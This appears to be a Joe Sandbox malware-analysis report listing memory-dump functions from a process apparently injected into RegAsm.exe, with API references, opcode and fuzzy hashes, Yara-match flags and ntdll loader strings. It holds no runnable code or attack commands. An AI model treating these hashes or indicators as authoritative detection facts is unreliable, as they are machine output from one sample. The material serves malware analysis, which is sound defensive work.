API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 930f22d611ce53062ffeeb93d21fa4f15213684f13c8247b4793d36a8f908438
Instruction ID: dba9cd117774324bb38dcbb2c36d4389546f2b07a74cbb9a0df1b59b8a88d63e
Opcode Fuzzy Hash: 930f22d611ce53062ffeeb93d21fa4f15213684f13c8247b4793d36a8f908438
Instruction Fuzzy Hash: F490047D731C04030105F5DC074C5070447C7D5351355C031F1015D50CD731CD715131

Function 03392F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392F3A

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a3490f04fd4f572994b60e85ebd4df2c72c9c2ac4befe48aac6a81964391686
Instruction ID: e1b8392340df4969542627b9ab08a7f1000526b9eee74459e9a1720a2f63c123
Opcode Fuzzy Hash: 1a3490f04fd4f572994b60e85ebd4df2c72c9c2ac4befe48aac6a81964391686
Instruction Fuzzy Hash: 3D9002A575180842D100B19C4458B060405C7E1301F55C015E1064954D8719CD526126

Function 03392FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392FBA

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fafcd0bfaa8bd1c5ce917de2dff88e20ea586758b664ede61df51d16d6b4e6aa
Instruction ID: ce1fa095d529749983fe15b5113a46647fb6a52ea6fdcadf412cc5c0dc805934
Opcode Fuzzy Hash: fafcd0bfaa8bd1c5ce917de2dff88e20ea586758b664ede61df51d16d6b4e6aa
Instruction Fuzzy Hash: 70900265B11804424140B1AC88889064405EBE1211755C121A0998950D865989655665

Function 03392F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392F9A

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b08708877f5027b99bacfc69486327883a20603a370045cc65ef8b9c1b017f0f
Instruction ID: bd40efc52576b75350c877bae5d7e0e23899c9681381285944ec54d61dafbbca
Opcode Fuzzy Hash: b08708877f5027b99bacfc69486327883a20603a370045cc65ef8b9c1b017f0f
Instruction Fuzzy Hash: 23900275711C0802D100B19C485870B0405C7D0302F55C011A1164955D872589516571

Function 03392FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392FEA

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 277dea1be517bcf29f3723368de4930f75775dae54563d79d97200da47738e09
Instruction ID: a9e19cc283d32b4b1471cda1bd0d5a69ab9e1d6ec5598ded0a4188fb547f6261
Opcode Fuzzy Hash: 277dea1be517bcf29f3723368de4930f75775dae54563d79d97200da47738e09
Instruction Fuzzy Hash: 7C900265721C0442D200B5AC4C58B070405C7D0303F55C115A0154954CCA1589615521

Function 03392EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392EAA

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec39e1356432f4e426f8c7cd8086348773cd26bb15c553c11b931257821e62f5
Instruction ID: 90b156b51cc5c099937cfb936f434c832b98a8abd70c4e1e2f8d87abed0c6925
Opcode Fuzzy Hash: ec39e1356432f4e426f8c7cd8086348773cd26bb15c553c11b931257821e62f5
Instruction Fuzzy Hash: EA9002B571180802D140B19C44487460405C7D0301F55C011A5064954E87598ED56665

Function 03392E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392E8A

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2796daa543289e993eb0628d34f6d2abc348e5df11d4429795b4ecf1ce22ffee
Instruction ID: 80f70d271983670f90194415ea567bafb7d41123a421aff1c579ab87ef0f1b66
Opcode Fuzzy Hash: 2796daa543289e993eb0628d34f6d2abc348e5df11d4429795b4ecf1ce22ffee
Instruction Fuzzy Hash: 60900265B1180902D101B19C4448616040AC7D0241F95C022A1024955ECB258A92A131

Function 03392D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392D3A

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 081c2e411fb072e96b3d74dd4e30b64774e775df6e067cfabb3418df13ff2584
Instruction ID: d7d49261772b4fb19511ec037434de96b4d442f37dd72d7d95a9777e0f053958
Opcode Fuzzy Hash: 081c2e411fb072e96b3d74dd4e30b64774e775df6e067cfabb3418df13ff2584
Instruction Fuzzy Hash: CE90026571180403D140B19C545C6064405D7E1301F55D011E0414954CDA1589565222

Function 03392D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392D1A

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 922f1a872ca1a70ac0e65098a9a31ea7f84dba146cd33b846958f642c6894639
Instruction ID: f31bb3cda44af716bc7833cbf1626141e4c6c7aa64809e35606b3b54f14a27a2
Opcode Fuzzy Hash: 922f1a872ca1a70ac0e65098a9a31ea7f84dba146cd33b846958f642c6894639
Instruction Fuzzy Hash: 1890026D72380402D180B19C544C60A0405C7D1202F95D415A0015958CCA1589695321

Function 03392DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392DFA

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50062f783173f01c1e8ff4a41bf6bda0947c1101334576ea035edba4ac25d7cc
Instruction ID: 8297d8392b25441033d860489f655fdd827643d87a21cf75792d1534bf25088e
Opcode Fuzzy Hash: 50062f783173f01c1e8ff4a41bf6bda0947c1101334576ea035edba4ac25d7cc
Instruction Fuzzy Hash: 9390027571180813D111B19C45487070409C7D0241F95C412A0424958D97568A52A121

Function 03392DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392DDA

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01228bbee43c7a03b5cb030b43b85d8485f93f700b5a2f277f101f8afbf57b80
Instruction ID: 905159c7f9e6e3ad2bbf61526de90d9e5f170f66744d6b451917520b9485dfb6
Opcode Fuzzy Hash: 01228bbee43c7a03b5cb030b43b85d8485f93f700b5a2f277f101f8afbf57b80
Instruction Fuzzy Hash: 6A900265752845525545F19C44485074406D7E0241795C012A1414D50C86269956D621

Function 03392C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392C7A

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3888a8b178f5a2984c8cd77c9b63a6bd5ed4464d5a3f2f0374ddaa2ae4458090
Instruction ID: c89ce923e6da99abfae03c7476c5ee8609a10f92000beaaad211db84f98e88b8
Opcode Fuzzy Hash: 3888a8b178f5a2984c8cd77c9b63a6bd5ed4464d5a3f2f0374ddaa2ae4458090
Instruction Fuzzy Hash: 8E90027571188C02D110B19C844874A0405C7D0301F59C411A4424A58D879589917121

Function 03392CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392CAA

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f854e084063f562df9ca698d6896f00b8f63ae2950d935ab932180713b61fb7c
Instruction ID: 597220a8a84223b48bf6fb079f4ea0498da1a9962d7f51eb1739b9688bd7c24a
Opcode Fuzzy Hash: f854e084063f562df9ca698d6896f00b8f63ae2950d935ab932180713b61fb7c
Instruction Fuzzy Hash: 2B90027571180802D100B5DC544C6460405C7E0301F55D011A5024955EC76589916131

Function 00409AB0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6028b18f2e1e58fc3a7b7b10070627a51411be046c57d706c5f8744435bb80a8
Instruction ID: d58fe8e4865b7a2b9ec26276515fb776abeb1cc765f7a728b76389d142a7d987
Opcode Fuzzy Hash: 6028b18f2e1e58fc3a7b7b10070627a51411be046c57d706c5f8744435bb80a8
Instruction Fuzzy Hash: 03213AB2D4020857CB25DA64AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

Function 0041A686 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A63D
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6B8

Strings

6EA, xrefs: 0041A632, 0041A63C

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateExitHeapProcess
String ID: 6EA
API String ID: 1054155344-1400015478
Opcode ID: cc7ba4317189590c5731299677cac2e466cdd6f833a7d84a0d848444cd0ea976
Instruction ID: cd0d688ebe13157bde6d1134354cd9220890cdaad09200b62ca17605b3c4755e
Opcode Fuzzy Hash: cc7ba4317189590c5731299677cac2e466cdd6f833a7d84a0d848444cd0ea976
Instruction Fuzzy Hash: 23116AB5205208AFCB14DFA8DC81DEB77A8AF98314B14864AF95997241C634E911CBB1

Function 0041A610 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A63D

Strings

6EA, xrefs: 0041A632, 0041A63C

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 40c982ab17707e2b410e1c5409a41692a3fa083e26650c49c7451406e8c37e8f
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 05E012B1200208ABDB14EF99CC41EA777ACAF88664F118599BA085B242C630F9118AB0

Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 841d397983599c81742cd55c23c7e847e42bc74fc3507d16a27513cd62c70edf
Instruction ID: 9e088243c9240b7b04b98f122b488c03d62481f61866f28c257c74414f2a5939
Opcode Fuzzy Hash: 841d397983599c81742cd55c23c7e847e42bc74fc3507d16a27513cd62c70edf
Instruction Fuzzy Hash: EA01DB71A803187AE720A6559C42FFF7B285B41F54F04015EFE44BA1C1D6B9250547E5

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 316fcb7f3e3910f8cd95084ee32cd0d49b5cc1e9597650a0ed193f63ebe15759
Instruction ID: ee4297080f87ae1612e18f34f2b0feab3a9f48bf419a2075f585a901aa565cbe
Opcode Fuzzy Hash: 316fcb7f3e3910f8cd95084ee32cd0d49b5cc1e9597650a0ed193f63ebe15759
Instruction Fuzzy Hash: C201A771A8032877E720A6959C43FFF776C5B40F54F05012EFF04BA1C2EAA8690546FA

Function 00408393 Relevance: 1.5, APIs: 1, Instructions: 43
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 21d63f1fce37bd95492eb74210360441cb18986c4147447d3f4746c3b83e94f1
Instruction ID: 5ec486d95b2f3a55a09f594b142cbf70e28098c4449e04b7787b5fadb6fd92bd
Opcode Fuzzy Hash: 21d63f1fce37bd95492eb74210360441cb18986c4147447d3f4746c3b83e94f1
Instruction Fuzzy Hash: F3F02035A813283AE22025452D03FBFB24C9B81F11F14002FFF04FA2C0EAE9681212FE

Function 0041A7A1 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7E0

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b16ae28a3ad2562eebaf11eb1f5c8ef585e59e63d3235b27f91a0f4ac48349e0
Instruction ID: 124dfaf1165f0c3a18efa9bd113a035ceabb61cbbacb5cad05e272d714cf0a82
Opcode Fuzzy Hash: b16ae28a3ad2562eebaf11eb1f5c8ef585e59e63d3235b27f91a0f4ac48349e0
Instruction Fuzzy Hash: 90E092B5241208ABDB20DF59DC85EE737AD9F85624F018456F90C5B245CA34E852CBF5

Function 0041A643 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A67D

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 206fab433a79136d44f5e41aeede73992ff25882bb826f54b8eb7192f61fe527
Instruction ID: 42921ecbf51616a67d772ecac0fbeb18776a440c37754438bfeac4448fad2164
Opcode Fuzzy Hash: 206fab433a79136d44f5e41aeede73992ff25882bb826f54b8eb7192f61fe527
Instruction Fuzzy Hash: 79E0D8B80442815FDB00EF69D4848A777D1AF40314350898AF85D87603C235C65A8BA2

Function 0041A650 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A67D

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: b72e9c7b22f541dc41c1d1a10246ddd373065e735d4448d074fbc954ca37b8c1
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 87E04FB12002046BD714DF59CC45EE777ACEF88754F014559FD0857241C630F910CAF0

Function 0041A7B0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7E0

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 3f1ae1b1237172d942cce931b31f8312165e47ec9f534217c5cde90707cac66d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 61E01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5

Function 0041A690 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6B8

Memory Dump Source

Source File: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: d78a951113e9701e76f621591aa5d7c1e9bf200ce9b22b72a98eb4ae228d99c8
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 6CD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C535BA108AE1

Function 03392C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03392C24

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b938a5330797ae46255c3f07eff18cf423d4547a2b7a4a4884ed7493eaf14d31
Instruction ID: ea57f107a5493ef9db8636529fddfffb4cda2cfd6129d6494e1151c300e2d2bc
Opcode Fuzzy Hash: b938a5330797ae46255c3f07eff18cf423d4547a2b7a4a4884ed7493eaf14d31
Instruction Fuzzy Hash: A1B09B71D01DC9D5EE11E7644A4C7177D04A7D0701F19C462D2034651F4739D1D1E575

Non-executed Functions

Function 033D2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

RaiseExceptionOnPossibleDeadlock, xrefs: 033D2579
ShutdownFlags, xrefs: 033D24A1
CFGOptions, xrefs: 033D2967
minkernel\ntdll\ldrinit.c, xrefs: 033D3187
MaxLoaderThreads, xrefs: 033D24EC
DisableHeapLookaside, xrefs: 033D246D
@, xrefs: 033D2942
GlobalFlag2, xrefs: 033D2FC0
LdrpInitializeExecutionOptions, xrefs: 033D317D
ExecuteOptions, xrefs: 033D25A0
UseImpersonatedDeviceMap, xrefs: 033D251C
MinimumStackCommitInBytes, xrefs: 033D2BB0
TracingFlags, xrefs: 033D2549
FrontEndHeapDebugOptions, xrefs: 033D2489
UnloadEventTraceDepth, xrefs: 033D24C0
GlobalFlag, xrefs: 033D2F3F, 033D3059
@, xrefs: 033D2B74
DisableExceptionChainValidation, xrefs: 033D275F
Initializing the application verifier package failed with status 0x%08lx, xrefs: 033D3176
MaxDeadActivationContexts, xrefs: 033D2D82

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: cb7962ec40e9ec9d09922f018993ad252937c5bb32b267906ac637ebc2ca9dfd
Instruction ID: f64c60998ede0df026dd119833b440992d4326629f8a3b07be5fb9b9d1947212
Opcode Fuzzy Hash: cb7962ec40e9ec9d09922f018993ad252937c5bb32b267906ac637ebc2ca9dfd
Instruction Fuzzy Hash: 7D924676A08741AFE721DF24D8C0B6BB7E8AB84754F084D2DFA95DB250D770E844CB92

Function 03388620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Critical section debug info address, xrefs: 033C541F, 033C552E
Critical section address., xrefs: 033C5502
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033C540A, 033C5496, 033C5519
undeleted critical section in freed memory, xrefs: 033C542B
Thread identifier, xrefs: 033C553A
corrupted critical section, xrefs: 033C54C2
Address of the debug info found in the active list., xrefs: 033C54AE, 033C54FA
Thread is in a state in which it cannot own a critical section, xrefs: 033C5543
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033C54E2
8, xrefs: 033C52E3
Critical section address, xrefs: 033C5425, 033C54BC, 033C5534
Invalid debug info address of this critical section, xrefs: 033C54B6
double initialized or corrupted critical section, xrefs: 033C5508
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033C54CE

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 2168a00228c86360c216c64b9ae911498592ed4032562e08bdfc5001acd08c3d
Instruction ID: 6c2aaa0bda0e74b1862f9edbac2bab2856ddcfee9f73830d5426285c62627e4d
Opcode Fuzzy Hash: 2168a00228c86360c216c64b9ae911498592ed4032562e08bdfc5001acd08c3d
Instruction Fuzzy Hash: 1281ADB5A00348AFEB20CF95CC81BAEBBF9AB0A710F148159F519BB641D375AD44CB50

Function 033829F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 033C2624
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 033C24C0
@, xrefs: 033C259B
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 033C2602
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 033C2409
RtlpResolveAssemblyStorageMapEntry, xrefs: 033C261F
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 033C2498
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 033C2506
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 033C22E4
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 033C2412
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 033C25EB

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 4c16887ab0a22da984c759a263db885777dcca66db4f22fd76c1114a89082738
Instruction ID: ce4419b4df45795d3084d964b1641d063f3dd7a221a816c8fd301a72825763c6
Opcode Fuzzy Hash: 4c16887ab0a22da984c759a263db885777dcca66db4f22fd76c1114a89082738
